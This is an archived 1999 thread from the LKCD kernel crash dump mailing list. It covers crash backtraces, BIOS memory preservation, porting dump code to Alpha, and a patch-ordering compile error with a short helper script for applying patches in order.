 #4 [c0b3bf2c] do_8259A_IRQ+0x75 at c010a319
    (9,c0b3bf44,c0b3bfbc,ret_from_intr,c0e68280)
 #5 [c0b3bf3c] do_IRQ+0x23 at c010a653
    (c0e68280,0,4,4,c0e68284)
 #6 [c0b3bfbc] ret_from_intr at c0109634
    (4,bfffc9a0,0,bfffc8a0,0)
 #7 [bfffd224] system_call+0x34 at c0109598

For this test crash I set a flag with a system call which instructed
the tulip interrupt handler to call panic().

Now the request for help. Some BIOS (Dell, NEC) clear memory on reboot
even when the flags to not test or to preserve are set. Others (HP) do
not clear memory. Can someone point me to BIOS developers at Dell or
Phoenix or other manufacturers so that I can lobby for a flag that I
can pass to the BIOS so that it will preserve the contents of memory?

If anyone is interested in trying my code I'd be glad to make it
available today or tomorrow.
thanks Dave --------------DA32CFCCD346A1644011B3F3-- From owner-lkcd@oss.sgi.com Mon Dec 13 09:50:42 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 09:50:23 -0800 Received: from deliverator.sgi.com ([204.94.214.10]:41484 "EHLO deliverator.sgi.com") by oss.sgi.com with ESMTP id ; Mon, 13 Dec 1999 09:49:59 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by deliverator.sgi.com (980309.SGI.8.8.8-aspam-6.2/980310.SGI-aspam) via ESMTP id JAA21114 for ; Mon, 13 Dec 1999 09:44:34 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id JAA26633; Mon, 13 Dec 1999 09:47:33 -0800 (PST) Date: Mon, 13 Dec 1999 09:47:32 -0800 (PST) From: Matt Robinson Reply-To: Matt Robinson To: Ashish Arora cc: Matt Robinson , lkcd@oss.sgi.com Subject: Re: info for LKCD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Hi, Ashish. You can get most of your answers from the FAQ, but please visit our website: http://oss.sgi.com/projects/lkcd If you have specific questions that the FAQ doesn't answer, we'll do what we can to help. Also, feel free to review the mail archive for this newsgroup, also available via the URL above, to see what has been discussed in the past. --Matt On Mon, 13 Dec 1999, Ashish Arora wrote: |>I would like to know where i can get the source code for the lkcd project. I would also like to ask the eople working on the Mission Critical Linux to tell me about the aspects of Mission Critical Computing they are dealing in at present. And what are the facilities that will be provided in that Linux. |> Matt, can u tell me more about what is really being done in the ares of system Dumps and what is being dealt in system crashes, what is the solution for system crash. 
|> |>- Ashish |> |> |>On Mon, 13 Dec 1999 00:25:47 Matt Robinson wrote: |>>There are a few development fronts in the area of system dumps. |>>The LKCD project is one such effort, although there is an additional |>>effort from the folks at Mission Critical Linux, who are on this list |>>and can provide information about their work. Beyond that, there are |>>a few things that provide information about system crashes, but that |>>doesn't really address your need for system dumps. |>> |>>If you've got questions about LKCD, check out: |>> |>> http://oss.sgi.com/projects/lkcd/faq.html |>> |>>We consider it the foundation for system dumps in Linux, for both |>>now and in the future. Your mileage may vary. :) |>> |>>You can also download the code and see our implementation mechanism |>>if you're curious about the code. It's fairly straightforward. |>> |>>I'm in the process of writing a paper for our talk at LinuxExpo on |>>LKCD, and when it's finished and thoroughly reviewed, I'll send it |>>out. For those of you who'd like to attend the talk, Tom and I will |>>be in New York in February at LinuxExpo to discuss LKCD (along with |>>other efforts in the community) and how we can make kernel dumps a |>>supported reality for commercial Linux users. |>> |>>--Matt |>> |>>P.S. To everyone out there, I'll send out a new News bulletin as to |>> where we're at with things here, including what we're working on, |>> what we need from the community, etc. Thanks for all your support. |>> |>>On Mon, 13 Dec 1999, Ashish Arora wrote: |>>|> Can any one guide me to what is the system dump and what is the work |>>|> being done in that area in Linux. I would also like to know about the |>>|> various crash facilities that are being provided in Linux. |>> |>> |> |> |>LYCOShop is now open. On your mark, get set, SHOP!!! 
|>http://shop.lycos.com/ |> From owner-lkcd@oss.sgi.com Mon Dec 13 12:39:33 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 12:39:23 -0800 Received: from mailext12.compaq.com ([207.18.199.188]:31650 "HELO mailext12.compaq.com") by oss.sgi.com with SMTP id ; Mon, 13 Dec 1999 12:39:03 -0800 Received: by mailext12.compaq.com (Postfix, from userid 12345) id DEA57578ED; Mon, 13 Dec 1999 14:37:54 -0600 (CST) Received: from mailint02.im.hou.compaq.com (mailint02.compaq.com [207.18.199.35]) by mailext12.compaq.com (Postfix) with ESMTP id D9C3754601; Mon, 13 Dec 1999 14:37:54 -0600 (CST) Received: by mailint02.im.hou.compaq.com (Postfix, from userid 12345) id CAF21BC4CA; Mon, 13 Dec 1999 14:37:47 -0600 (CST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by mailint02.im.hou.compaq.com (Postfix) with SMTP id 43BCFB2A43; Mon, 13 Dec 1999 14:37:47 -0600 (CST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA04482; Mon, 13 Dec 1999 13:37:53 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA03900; Mon, 13 Dec 1999 13:37:52 -0700 Content-Length: 2626 Message-Id: X-Mailer: XFMail 1.4.4 on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Mime-Version: 1.0 In-Reply-To: Date: Wed, 15 Dec 1999 08:38:08 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: Matt Robinson Subject: Re: Volunteer to work with Alpha port of lkcd Cc: lkcd@oss.sgi.com Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing OK, I am actively working on this now (the Linux Alpha machines I have access to have had problems; I've put the kernel tree on an NFS mount so I can continue to work). Do I have to do the inline assembly to save the PC and RA registers, or can I simply stuff them into the dump header structure? 
BTW, I notice lots of 32 bit
fields in the header, those will all have to be 64 bit for Alpha, won't they?
Certainly at least the registers will; I think having others in the structure
32 bit may cause alignment problems on the Alpha.

So, can I just make the dh_esp and dh_eip uint64_t, remove the inline asm and
the call to __dump_save_panic_regs, and just do:

/* This is __dump_execute */

dump_header.dh_esp = regs->pc;
/* from arch/alpha/kernel/traps.c, r26 appears to be ra */
dump_header.dh_eip = regs->r26;

/* dump out the header */

Also, what do you mean by putting a hook in die_if_kernel()? Do you mean to
call the kernel dump routine - dump_execute() ?

On 01-Dec-1999 Matt Robinson wrote:
> The first thing to do is to take the kernel code in
> arch/i386/kernel/vmdump.c and copy it to arch/alpha/kernel, modify
> the makefile, and then modify the calls for saving the pt_regs.
>
> The code for saving the registers is mostly correct, except for:
>
>     if (regs) {
>         memcpy((void *)&(dump_header.dh_regs), (const void *)regs,
>             sizeof(struct pt_regs));
>>        if (!user_mode(regs)) {
>>            dump_header.dh_regs.esp = (unsigned long) (regs + 1);
>>        }
>     }
>
> Those lines aren't necessarily needed -- they are I386 specific. We
> have to adjust the esp based on the processor mode.
>
> Also, the code for:
>
>     /* save the dump specific esp/eip */
>     __asm__ __volatile__("
>         pushl %%eax\n
>         movl %%esp, %%eax\n
>         movl %%eax, %0\n
>         popl %%eax\n"
>         : "=g" (dump_header.dh_esp)
>     );
>     __asm__ __volatile__("pushl %eax\n");
>     __dump_save_panic_regs();
>     __asm__ __volatile__("popl %eax\n");
>
> All of this is set up just to save the stack pointer and program
> counter for this box, as the pt_regs on I386 boxes don't necessarily
> point to the right location. We want to be able to walk back from
> the exception where that is possible.
>
> In looking at the Alpha stuff, I think you can start by saving the PC
> and RA values (not sure which $XX they represent), and also put a hook
> into die_if_kernel() in traps.c.

--
Brian Hall
Linux Consultant

From owner-lkcd@oss.sgi.com Mon Dec 13 13:11:03 1999
Received: by oss.sgi.com id ; Mon, 13 Dec 1999 13:10:53 -0800
Received: from pneumatic-tube.sgi.com ([204.94.214.22]:11056 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Mon, 13 Dec 1999 13:10:43 -0800
Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id NAA03240 for ; Mon, 13 Dec 1999 13:11:19 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com)
Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id NAA33419; Mon, 13 Dec 1999 13:08:18 -0800 (PST)
Date: Mon, 13 Dec 1999 13:08:17 -0800 (PST)
From: Matt Robinson
To: Brian Hall
cc: Matt Robinson , lkcd@oss.sgi.com
Subject: Re: Volunteer to work with Alpha port of lkcd
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-lkcd@oss.sgi.com
Precedence: bulk
Return-Path:
X-Orcpt: rfc822;lkcd-outgoing

On Wed, 15 Dec 1999, Brian Hall wrote:
|>OK, I am actively working on this now (the Linux Alpha machines I have access
|>to have had problems; I've put the kernel tree on an NFS mount so I can
|>continue to work).
|>
|>Do I have to do the inline assembly to save the PC and RA registers, or can I
|>simply stuff them into the dump header structure? BTW, I notice lots of 32 bit
|>fields in the header, those will all have to be 64 bit for Alpha, won't they?
|>Certainly at least the registers will; I think having others in the structure
|>32 bit may cause alignment problems on the Alpha.

The problem is from panic(), you don't have the registers, so you
need to grab them.
That way the 'lcrash' code has a point to start
with as far as the failing process is concerned. Hence the "if (regs)"
stuff.

|>So, can I just make the dh_esp and dh_eip uint64_t, remove the inline asm and
|>the call to __dump_save_panic_regs, and just do:
|>
|>/* This is __dump_execute */
|>
|>dump_header.dh_esp = regs->pc;
|>/* from arch/alpha/kernel/traps.c, r26 appears to be ra */
|>dump_header.dh_eip = regs->r26;
|>
|>/* dump out the header */

The dump_header uses pt_regs, and if the alpha stuff is translated
right for your build, it should be the right type without you having
to do anything. Such as:

    regs->esp is 32-bit (long) for i386; however
    regs->pc is 64-bit (unsigned long) for alpha.

No type-casting should be necessary, assuming architecture compatible
pt_regs stuff is being used. If you do see a problem, however, let me
know and I'll fix it in the main code.

|>Also, what do you mean by putting a hook in die_if_kernel()? Do you mean to
|>call the kernel dump routine - dump_execute() ?

Correct. Be sure that panic() also calls dump_execute().

|>On 01-Dec-1999 Matt Robinson wrote:
|>> The first thing to do is to take the kernel code in
|>> arch/i386/kernel/vmdump.c and copy it to arch/alpha/kernel, modify
|>> the makefile, and then modify the calls for saving the pt_regs.
|>>
|>> The code for saving the registers is mostly correct, except for:
|>>
|>>     if (regs) {
|>>         memcpy((void *)&(dump_header.dh_regs), (const void *)regs,
|>>             sizeof(struct pt_regs));
|>>>        if (!user_mode(regs)) {
|>>>            dump_header.dh_regs.esp = (unsigned long) (regs + 1);
|>>>        }
|>>     }
|>>
|>> Those lines aren't necessarily needed -- they are I386 specific. We
|>> have to adjust the esp based on the processor mode.
|>>
|>> Also, the code for:
|>>
|>>     /* save the dump specific esp/eip */
|>>     __asm__ __volatile__("
|>>         pushl %%eax\n
|>>         movl %%esp, %%eax\n
|>>         movl %%eax, %0\n
|>>         popl %%eax\n"
|>>         : "=g" (dump_header.dh_esp)
|>>     );
|>>     __asm__ __volatile__("pushl %eax\n");
|>>     __dump_save_panic_regs();
|>>     __asm__ __volatile__("popl %eax\n");
|>>
|>> All of this is set up just to save the stack pointer and program
|>> counter for this box, as the pt_regs on I386 boxes don't necessarily
|>> point to the right location. We want to be able to walk back from
|>> the exception where that is possible.
|>>
|>> In looking at the Alpha stuff, I think you can start by saving the PC
|>> and RA values (not sure which $XX they represent), and also put a hook
|>> into die_if_kernel() in traps.c.
|>
|>--
|>Brian Hall
|>Linux Consultant
|>

From owner-lkcd@oss.sgi.com Tue Dec 14 01:23:09 1999
Received: by oss.sgi.com id ; Tue, 14 Dec 1999 01:22:59 -0800
Received: from fes-qout.whowhere.com ([209.1.236.7]:5622 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Tue, 14 Dec 1999 01:22:41 -0800
Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Tue Dec 14 01:20:22 1999
To: "Matt Robinson"
Date: Tue, 14 Dec 1999 01:20:22 -0800
From: "Ashish Arora"
Message-ID:
Mime-Version: 1.0
Cc: lkcd@oss.sgi.com
X-Sent-Mail: off
Reply-To: ashisharora@mailcity.com
X-Mailer: MailCity Service
Subject: Re:Info for LKCD
X-Sender-Ip: 192.35.232.115
Organization: MailCity (http://www.mailcity.lycos.com:80)
Content-Type: text/plain; charset=us-ascii
Content-Language: en
Content-Length: 3482
Content-Transfer-Encoding: 7bit
Sender: owner-lkcd@oss.sgi.com
Precedence: bulk
Return-Path:
X-Orcpt: rfc822;lkcd-outgoing

Hi Matt,
Can you also give me the details of the Trace facilities that are being implemented or are already implemented in Linux. Also what is the work being done in this field of trace and what type of trace is being worked on(if some work is going on in this regard).
I would also like to know what other features of RAS(Reliability, Availability and Servicability) are already implemented in Linux or are being implemented. --Ashish -- On Mon, 13 Dec 1999 09:47:32 Matt Robinson wrote: >Hi, Ashish. You can get most of your answers from the FAQ, but >please visit our website: > > http://oss.sgi.com/projects/lkcd > >If you have specific questions that the FAQ doesn't answer, we'll >do what we can to help. Also, feel free to review the mail archive >for this newsgroup, also available via the URL above, to see what >has been discussed in the past. > >--Matt > >On Mon, 13 Dec 1999, Ashish Arora wrote: >|>I would like to know where i can get the source code for the lkcd project. I would also like to ask the eople working on the Mission Critical Linux to tell me about the aspects of Mission Critical Computing they are dealing in at present. And what are > >the facilities that will be provided in that Linux. >|> Matt, can u tell me more about what is really being done in the ares of system Dumps and what is being dealt in system crashes, what is the solution for system crash. >|> >|>- Ashish >|> >|> >|>On Mon, 13 Dec 1999 00:25:47 Matt Robinson wrote: >|>>There are a few development fronts in the area of system dumps. >|>>The LKCD project is one such effort, although there is an additional >|>>effort from the folks at Mission Critical Linux, who are on this list >|>>and can provide information about their work. Beyond that, there are >|>>a few things that provide information about system crashes, but that >|>>doesn't really address your need for system dumps. >|>> >|>>If you've got questions about LKCD, check out: >|>> >|>> http://oss.sgi.com/projects/lkcd/faq.html >|>> >|>>We consider it the foundation for system dumps in Linux, for both >|>>now and in the future. Your mileage may vary. :) >|>> >|>>You can also download the code and see our implementation mechanism >|>>if you're curious about the code. It's fairly straightforward. 
>|>> >|>>I'm in the process of writing a paper for our talk at LinuxExpo on >|>>LKCD, and when it's finished and thoroughly reviewed, I'll send it >|>>out. For those of you who'd like to attend the talk, Tom and I will >|>>be in New York in February at LinuxExpo to discuss LKCD (along with >|>>other efforts in the community) and how we can make kernel dumps a >|>>supported reality for commercial Linux users. >|>> >|>>--Matt >|>> >|>>P.S. To everyone out there, I'll send out a new News bulletin as to >|>> where we're at with things here, including what we're working on, >|>> what we need from the community, etc. Thanks for all your support. >|>> >|>>On Mon, 13 Dec 1999, Ashish Arora wrote: >|>>|> Can any one guide me to what is the system dump and what is the work >|>>|> being done in that area in Linux. I would also like to know about the >|>>|> various crash facilities that are being provided in Linux. >|>> >|>> >|> >|> >|>LYCOShop is now open. On your mark, get set, SHOP!!! >|>http://shop.lycos.com/ >|> > > > LYCOShop is now open. On your mark, get set, SHOP!!! 
http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Tue Dec 14 01:34:09 1999 Received: by oss.sgi.com id ; Tue, 14 Dec 1999 01:33:59 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:7003 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Tue, 14 Dec 1999 01:33:45 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id BAA03881 for ; Tue, 14 Dec 1999 01:34:16 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id BAA36295; Tue, 14 Dec 1999 01:31:15 -0800 (PST) Date: Tue, 14 Dec 1999 01:31:14 -0800 (PST) From: Matt Robinson To: Ashish Arora cc: Matt Robinson , lkcd@oss.sgi.com Subject: Re:Info for LKCD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing I'm afraid you'll have to research a lot of this on your own, Ashish. If there are others on this list that can contribute, feel free, however, I think spoon-fed knowledge can be a bit dangerous if given too often. --Matt On Tue, 14 Dec 1999, Ashish Arora wrote: |>Hi Matt, |> Can you also give me the details of the Trace facilities that are being implemented or are already implemented in Linux. Also what is the work being done in this field of trace and what type of trace is being worked on(if some work is going on i n this regard). |> I would also like to know what other features of RAS(Reliability, Availability and Servicability) are already implemented in Linux or are being implemented. |>--Ashish |>-- |> |>On Mon, 13 Dec 1999 09:47:32 Matt Robinson wrote: |>>Hi, Ashish. 
You can get most of your answers from the FAQ, but |>>please visit our website: |>> |>> http://oss.sgi.com/projects/lkcd |>> |>>If you have specific questions that the FAQ doesn't answer, we'll |>>do what we can to help. Also, feel free to review the mail archive |>>for this newsgroup, also available via the URL above, to see what |>>has been discussed in the past. |>> |>>--Matt |>> |>>On Mon, 13 Dec 1999, Ashish Arora wrote: |>>|>I would like to know where i can get the source code for the lkcd project. I would also like to ask the eople working on the Mission Critical Linux to tell me about the aspects of Mission Critical Computing they are dealing in at present. And what a re |>> |>>the facilities that will be provided in that Linux. |>>|> Matt, can u tell me more about what is really being done in the ares of system Dumps and what is being dealt in system crashes, what is the solution for system crash. |>>|> |>>|>- Ashish |>>|> |>>|> |>>|>On Mon, 13 Dec 1999 00:25:47 Matt Robinson wrote: |>>|>>There are a few development fronts in the area of system dumps. |>>|>>The LKCD project is one such effort, although there is an additional |>>|>>effort from the folks at Mission Critical Linux, who are on this list |>>|>>and can provide information about their work. Beyond that, there are |>>|>>a few things that provide information about system crashes, but that |>>|>>doesn't really address your need for system dumps. |>>|>> |>>|>>If you've got questions about LKCD, check out: |>>|>> |>>|>> http://oss.sgi.com/projects/lkcd/faq.html |>>|>> |>>|>>We consider it the foundation for system dumps in Linux, for both |>>|>>now and in the future. Your mileage may vary. :) |>>|>> |>>|>>You can also download the code and see our implementation mechanism |>>|>>if you're curious about the code. It's fairly straightforward. |>>|>> |>>|>>I'm in the process of writing a paper for our talk at LinuxExpo on |>>|>>LKCD, and when it's finished and thoroughly reviewed, I'll send it |>>|>>out. 
For those of you who'd like to attend the talk, Tom and I will |>>|>>be in New York in February at LinuxExpo to discuss LKCD (along with |>>|>>other efforts in the community) and how we can make kernel dumps a |>>|>>supported reality for commercial Linux users. |>>|>> |>>|>>--Matt |>>|>> |>>|>>P.S. To everyone out there, I'll send out a new News bulletin as to |>>|>> where we're at with things here, including what we're working on, |>>|>> what we need from the community, etc. Thanks for all your support. |>>|>> |>>|>>On Mon, 13 Dec 1999, Ashish Arora wrote: |>>|>>|> Can any one guide me to what is the system dump and what is the work |>>|>>|> being done in that area in Linux. I would also like to know about the |>>|>>|> various crash facilities that are being provided in Linux. |>>|>> |>>|>> |>>|> |>>|> |>>|>LYCOShop is now open. On your mark, get set, SHOP!!! |>>|>http://shop.lycos.com/ |>>|> |>> |>> |>> |> |> |>LYCOShop is now open. On your mark, get set, SHOP!!! |>http://shop.lycos.com/ |> From owner-lkcd@oss.sgi.com Tue Dec 14 22:30:02 1999 Received: by oss.sgi.com id ; Tue, 14 Dec 1999 22:29:52 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:59861 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Tue, 14 Dec 1999 22:29:39 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Tue Dec 14 22:27:17 1999 To: lkcd@oss.sgi.com Date: Tue, 14 Dec 1999 22:27:17 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Problem in Applying the patch X-Sender-Ip: 192.35.232.115 Attachments: xx.out Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: multipart/mixed; boundary="=_-=_-DAKHNALJEJFOAAAA" Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing This is a multi-part message in MIME format. You need a MIME compliant mail reader to completely decode it. 
--=_-=_-DAKHNALJEJFOAAAA Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 390 Content-Transfer-Encoding: 7bit Hello All, I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. Can anyone guide me how to resolve this problem. Ashish LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ --=_-=_-DAKHNALJEJFOAAAA Content-Type: application/x-unknown; name="xx.out" Content-Length: 5368 Content-Transfer-Encoding: 7bit memory.c: In function `map_user_kiobuf': memory.c:1058: structure has no member named `iob_astype' memory.c:1059: `AS_KERNEL' undeclared (first use in this function) memory.c:1059: (Each undeclared identifier is reported only once memory.c:1059: for each function it appears in.) memory.c:1066: `AS_IOSPACE' undeclared (first use in this function) memory.c:1067: `AS_REMOTE' undeclared (first use in this function) memory.c:1071: `AS_USER' undeclared (first use in this function) memory.c:1060: warning: unreachable code at beginning of switch statement memory.c: At top level: memory.c:1171: redefinition of `get_page' memory.c:978: `get_page' previously defined here memory.c:1193: redefinition of `get_page_map' memory.c:1000: `get_page_map' previously defined here memory.c:1213: redefinition of `map_user_kiobuf' memory.c:1020: `map_user_kiobuf' previously defined here memory.c:1325: redefinition of `unmap_kiobuf' memory.c:1148: `unmap_kiobuf' previously defined here {standard input}: Assembler messages: {standard input}:2085: Fatal error: Symbol get_page already defined. 
make[2]: *** [memory.o] Error 1 make[1]: *** [first_rule] Error 2 make: *** [_dir_mm] Error 2 g directory `/usr/src/linux-2.2.12/drivers/char' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/char' make -C net make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/net' make -C fc make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/net/fc' make all_targets make[4]: Entering directory `/usr/src/linux-2.2.12/drivers/net/fc' make[4]: Nothing to be done for `all_targets'. make[4]: Leaving directory `/usr/src/linux-2.2.12/drivers/net/fc' make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/net/fc' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/net' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/net' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/net' make -C misc make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/misc' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/misc' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/misc' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/misc' make -C sound make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/sound' make -C lowlevel make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/sound/lowlevel' make all_targets make[4]: Entering directory `/usr/src/linux-2.2.12/drivers/sound/lowlevel' make[4]: Nothing to be done for `all_targets'. make[4]: Leaving directory `/usr/src/linux-2.2.12/drivers/sound/lowlevel' make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/sound/lowlevel' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/sound' make[3]: Nothing to be done for `all_targets'. 
make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/sound' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/sound' make -C pci make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/pci' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/pci' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/pci' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/pci' make -C video make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/video' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/video' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/video' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/video' make -C scsi make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/scsi' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/scsi' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/scsi' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/scsi' make -C pnp make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/pnp' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/pnp' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/pnp' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/pnp' make -C cdrom make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/cdrom' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/cdrom' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/cdrom' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/cdrom' make all_targets make[2]: Entering directory `/usr/src/linux-2.2.12/drivers' make[2]: Nothing to be done for `all_targets'. 
make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers' make[1]: Leaving directory `/usr/src/linux-2.2.12/drivers' make -C mm make[1]: Entering directory `/usr/src/linux-2.2.12/mm' make all_targets make[2]: Entering directory `/usr/src/linux-2.2.12/mm' gcc -D__KERNEL__ -I/usr/src/linux-2.2.12/include -Wall -Wstrict-prototypes -O2 -fomit-frame-pointer -fno-strict-aliasing -pipe -fno-strength-reduce -m386 -DCPU=386 -c -o memory.o memory.c make[2]: Leaving directory `/usr/src/linux-2.2.12/mm' make[1]: Leaving directory `/usr/src/linux-2.2.12/mm' --=_-=_-DAKHNALJEJFOAAAA-- From owner-lkcd@oss.sgi.com Tue Dec 14 23:16:12 1999 Received: by oss.sgi.com id ; Tue, 14 Dec 1999 23:16:02 -0800 Received: from ppp0.ocs.com.au ([203.34.97.3]:52488 "HELO mail.ocs.com.au") by oss.sgi.com with SMTP id ; Tue, 14 Dec 1999 23:15:52 -0800 Received: (qmail 3986 invoked by uid 502); 15 Dec 1999 07:14:45 -0000 Received: (qmail 3973 invoked from network); 15 Dec 1999 07:14:43 -0000 Received: from ocs3.ocs-net (192.168.255.3) by mail.ocs.com.au with SMTP; 15 Dec 1999 07:14:43 -0000 X-Mailer: exmh version 2.1.1 10/15/1999 From: Keith Owens To: ashisharora@mailcity.com cc: lkcd@oss.sgi.com Subject: Re: Problem in Applying the patch In-reply-to: Your message of "Tue, 14 Dec 1999 22:27:17 -0800." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 15 Dec 1999 18:14:42 +1100 Message-ID: <25634.945242082@ocs3.ocs-net> Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Tue, 14 Dec 1999 22:27:17 -0800, "Ashish Arora" wrote: > I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. You have to apply the raw I/O patch (sgi+straw2.2.13.patch) *before* the lkcd patch. 
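
[Archive note: a minimal sketch of the ordering Keith describes, not something posted to the list. It assumes both patches apply with -p1 from the top of the kernel tree and that the raw I/O patch is what introduces AS_KERNEL somewhere under include/ (the symbol name comes from the compile errors above; its location is a guess). The function names and the lkcd patch file name in the usage line are hypothetical.]

```shell
#!/bin/sh
# Sketch only: apply the raw I/O patch before the lkcd patch.

# rawio_applied TREE
# Exit status 0 if some file under TREE/include mentions AS_KERNEL.
# Assumption: the raw I/O patch declares AS_KERNEL in a header there.
rawio_applied() {
    grep -rq 'AS_KERNEL' "$1/include" 2>/dev/null
}

# apply_in_order TREE RAWIO_PATCH LKCD_PATCH
# Patch paths must be absolute, because each step runs inside TREE.
# Every patch is dry-run first so a failure leaves the tree untouched;
# -N stops patch from prompting about already-applied hunks.
apply_in_order() {
    tree=$1; rawio=$2; lkcd=$3
    if ! rawio_applied "$tree"; then
        (cd "$tree" &&
            patch -p1 -N --dry-run < "$rawio" >/dev/null &&
            patch -p1 -N < "$rawio") || return 1
    fi
    (cd "$tree" &&
        patch -p1 -N --dry-run < "$lkcd" >/dev/null &&
        patch -p1 -N < "$lkcd")
}
```

A call might look like `apply_in_order /usr/src/linux-2.2.12 /tmp/sgi+straw2.2.13.patch /tmp/lkcd.patch`, where `/tmp/lkcd.patch` stands in for whatever the lkcd 1.0.3 patch file is actually called. Starting from a freshly unpacked tree is the safer choice if an earlier attempt already modified mm/memory.c.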
